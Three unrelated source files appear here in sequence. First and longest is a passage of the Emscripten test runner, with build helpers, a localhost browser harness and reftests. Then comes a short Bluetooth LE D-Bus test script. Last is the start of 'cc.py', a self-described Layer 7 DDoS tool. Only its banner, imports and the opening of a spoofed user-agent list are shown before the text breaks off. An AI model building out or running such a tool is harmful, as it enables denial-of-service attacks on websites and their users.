assert count <= 1, ("Test file {} found with multiple valid extensions {}"
.format(test_path, ext_list))
return ret
src = find_files('.c', '.cpp')
output = find_files('.out', '.txt')
self.do_run_from_file(src, output, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:] == '.c'):
basename = 'src.c'
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
js_engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(js_engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in js_engines and not self.is_wasm_backend():
js_engines = [SPIDERMONKEY_ENGINE]
else:
js_engines = js_engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
js_engines += wasm_engines
if len(js_engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in js_engines:
js_output = self.run_generated_code(engine, js_file, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warnings. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(self, code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
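# Rough summary of the harness protocol implemented above (descriptive only):
# the test runner pushes (url, dir) pairs into in_queue; the harness page polls
# GET /check and receives either 'COMMAND:<url>' or '(wait)'; the page then
# loads the test, and the test reports back via a 'report_...' GET whose path
# is placed on out_queue for run_browser() to consume.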
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a single token, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdentical(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
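# Note on the metric above: 'wrong' is the per-channel mean absolute difference
# between the reference image and the canvas, floored to allow some antialiasing
# slack, which is why btest() below accepts any value in range(reference_slack + 1)
# when a reference image is used.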
def compile_btest(self, args):
run_process([PYTHON, EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'USE_PTHREADS=1' in args and self.is_wasm_backend():
# wasm2js does not support threads yet
also_asmjs = False
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library into a .bc file. We build the .bc file once and cache it
for all our tests. (We cache in memory since the test directory is destroyed
and recreated for each test. Note that we cache separately for different
compilers). This cache is just during the test runner. There is a different
concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
env = Building.get_building_env(native, True, cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
Building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end make stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all of the JS engines in JS_ENGINES appear to work.')
sys.exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
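# Informal note (not from the original comments): 0.5 / math.sqrt(num_tests) is
# the worst-case standard error of a pass rate estimated from num_tests
# pass/fail samples (it is largest when the true rate is 0.5), and the message
# above uses one such standard error below 100% as its margin.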
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_runner.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_runner.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
test1.py
|
#!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
try:
mainloop = GObject.MainLoop()
mainloop.run()
except KeyboardInterrupt:
mainloop.quit()
print("Thread: KeyboardInterrupt")
return
if __name__ == '__main__':
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
testutils.removeBondedDevices()
#startBackGroundEvents = threading.Thread(target=backGroundEvents)
#startBackGroundEvents.start()
startTests.main()
|
cc.py
|
#!/usr/bin/python3
#Coded by Leeon123
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
print ('''
///// ///// /////////////
CCCCC/ CCCCC/ | CC-attack |/
CC/ CC/ |-----------|/
CC/ CC/ | Layer 7 |/
CC///// CC///// | ddos tool |/
CCCCC/ CCCCC/ |___________|/
>--------------------------------------------->
Python3 version 1.7 (Add Post Attack Mode)
C0d3d by Lee0n123
===============================================
--> Use 443 Port Auto Enable SSL <--
TOS:
Don't Attack Government Website.
===============================================''')
useragents=["Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
